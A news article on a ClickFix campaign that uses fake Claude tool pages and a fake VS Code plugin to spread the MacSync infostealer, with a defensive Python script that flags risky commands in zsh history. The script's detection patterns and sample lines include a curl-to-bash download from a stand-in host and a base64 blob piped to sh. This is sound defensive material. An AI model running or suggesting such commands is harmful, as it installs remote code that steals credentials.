Mac Users Warned of ClickFix Attack via Fake Claude Tools Spreading MacSync Malware


Malicious Claude AI Campaign Targets Developers with MacSync Malware

A sophisticated phishing campaign, dubbed Claude Fraud, has been uncovered by cybersecurity researchers at 7AI. The attackers are exploiting the popularity of AI tools to trick developers into installing malware on their systems. The campaign is notable for its scale: it has compromised over 15,600 victims to date.

The Attack Vector

The attack begins with a Google search for a routine tool, such as a disk space checker or a Homebrew command. The attackers have created fake websites that appear at the top of the search results, often hosted on legitimate platforms like claude.ai or Squarespace. These sites convincingly mimic official documentation, making them hard to distinguish from legitimate sources even for tech-savvy professionals.

Installing the Malware

Once a user lands on one of these fake sites, they are instructed to copy a command into Terminal to complete the installation. That command is the trap, a technique known as ClickFix: running it installs MacSync, an infostealer that targets macOS Keychain credentials, including passwords, and wipes its own tracks after stealing browser cookies and crypto-wallet keys.
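Triage logic for the paste-into-Terminal step described above, added here as an example for this article and not code from 7AI or the campaign write-up; the matching rules and the zsh history lines are constructed assumptions, not indicators from the campaign.

```python
"""Flag ClickFix-style commands in a zsh history file.
Added example for this article (not 7AI's or the campaign's code);
the history lines at the bottom are constructed samples."""
import re
from typing import List, Tuple

# zsh extended history format: ": <epoch>:<elapsed>;<command>"
ZSH_EXT = re.compile(r"^: (\d+):\d+;(.*)$")

# Shapes a ClickFix lure typically asks the victim to paste: a download
# piped straight into a shell, a decoded blob run without touching disk,
# eval of fetched text, or an inline AppleScript.
PATTERNS = [
    ("download-to-shell", re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("decode-to-shell", re.compile(r"\bbase64\s+(-d|-D|--decode)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("eval-of-download", re.compile(r"\beval\b.*\$\((curl|wget)\b")),
    ("inline-osascript", re.compile(r"\bosascript\s+-e\b")),
]

def parse_history(text: str) -> List[Tuple[int, str]]:
    """Return (epoch, command) pairs; non-extended lines get epoch 0."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = ZSH_EXT.match(line)
        entries.append((int(m.group(1)), m.group(2)) if m else (0, line))
    return entries

def flag_clickfix(text: str) -> List[Tuple[int, str, str]]:
    """Return (epoch, rule, command) for every command matching a rule."""
    hits = []
    for epoch, cmd in parse_history(text):
        for name, pat in PATTERNS:
            if pat.search(cmd):
                hits.append((epoch, name, cmd))
                break  # report the first matching rule only
    return hits

# Constructed sample: two routine commands and two lure-shaped ones.
SAMPLE = """\
: 1710000000:0;brew install htop
: 1710000060:0;df -h
: 1710000120:0;curl -fsSL https://example.invalid/fix.sh | bash
: 1710000180:0;echo 'ZWNobyBoaQo=' | base64 -d | sh
"""

if __name__ == "__main__":
    for epoch, rule, cmd in flag_clickfix(SAMPLE):
        print(f"{epoch} [{rule}] {cmd}")
```

Run it against `~/.zsh_history` (or a copy of it) to surface commands of this shape for review; a hit is a prompt to inspect the command, not proof of compromise.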

Windows Systems Also Targeted

The researchers noted that the campaign is not limited to Mac users. A second variant targets Windows systems through VS Code, the popular code editor. Here the attackers have created a fake Claude Code plugin that developers install unknowingly; it runs in the background and lets the attackers execute a second-stage payload, such as a fake utility called CrossMark2, without detection.

Sophisticated Tactics

The attackers have also been found to have used stolen advertising accounts from a children’s charity in Canada and a retailer in Colombia to get their fake ads approved by Google. This level of sophistication highlights the importance of verifying the source of any AI tool before permitting it to run on a machine.

Conclusion

In light of this campaign, it is essential for developers to exercise extreme caution when searching for and installing software tools. Always double-check the source of an AI tool to avoid falling victim to this type of attack.
